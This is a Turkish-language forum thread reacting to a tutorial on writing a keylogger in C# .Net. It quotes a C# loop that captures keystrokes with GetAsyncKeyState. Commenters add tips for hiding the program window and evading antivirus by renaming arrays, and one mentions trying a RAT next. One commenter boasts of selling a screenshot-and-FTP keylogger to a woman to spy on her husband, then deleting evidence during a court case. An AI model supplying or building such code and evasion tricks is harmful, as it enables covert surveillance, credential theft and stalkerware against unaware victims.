[Döküman] C# . Net Ile Keylogger Yapımı
-
basarili bir yol gosterme olmus hocam. ben hemen hemen aynisini ekranin resminide cekip ftp'ye ekleyen bir hal yapmistim. (para karsiliginda bir bayana) sonra kocasinin msnde baskasi ile sanal sex yaptiginin kaydini aldi mahkemeye filan gidiyordu durum ftp yi silip kocan hackletmistir demistim :D
-
Dostum ellerine saglik bu konuyla alakali bir suru soru geliyordu zaten...
-
adam paylaşımın bş yerine koymuş :)
-
formu gizlemek için basit bir yöntem olarak timer intervalini 50 yapıp this.hide(); demeniz yeterli.
dizi kullanır ve dizinin ismini değiştirdiğinizde de antivirüslere tekrar yakalanmaz hale gelir.
Ayriyetten programa iki kez tıklama olasılığına karşı açılışta process kontrolleri yaptırmanız iyi olur.
yalnız bu en basit klavye okuma yöntemidir. antivirüsler yakalamasa bile bütün malware programlar yakalar. bilginiz olsun.
-
FCN bunu yazdı
Şu fonksiyon işimizi görecektir. Açıkcası apileri tek tek anlatmak isterdim ama zaten keylogger yazıcak kişinin az çok hakim olduğunu düşündüğümden fazla detaya girmiyorum.
Şimdide klavyeden girilen tuşları nasıl yakalayacağımıza bakalım.
Bir tane tuşları yakalamak için fonksiyon oluşturuyoruz.
Şu şekilde bir foreach döngümüz var
Benim de bir katkım olsun:) Bu foreach içerisinde :
string y = "";
foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
{
int x = GetAsyncKeyState(i);
if ((x == 1) || (x == -32767))
{
y = Enum.GetName(typeof(Keys), i) + "";
}
}böyle bir if kontrolu koyarsanız her tuşu bir kez algılayacaktır. örnek olarak -32768 koşulu koyulduğunda tuşu birden fazla algılar.
-
bir gece acil ihtiyaçtan beraber başladığımız iş :) bir ara da rat denemek lazım artık framework sorunu da kalmadığından..zevkli oluyor gece yarısı bir heves başlanan işler
eline sağlık
yazarken altta visual studio açık..ben aşıyorum bu tembelliği iyice :D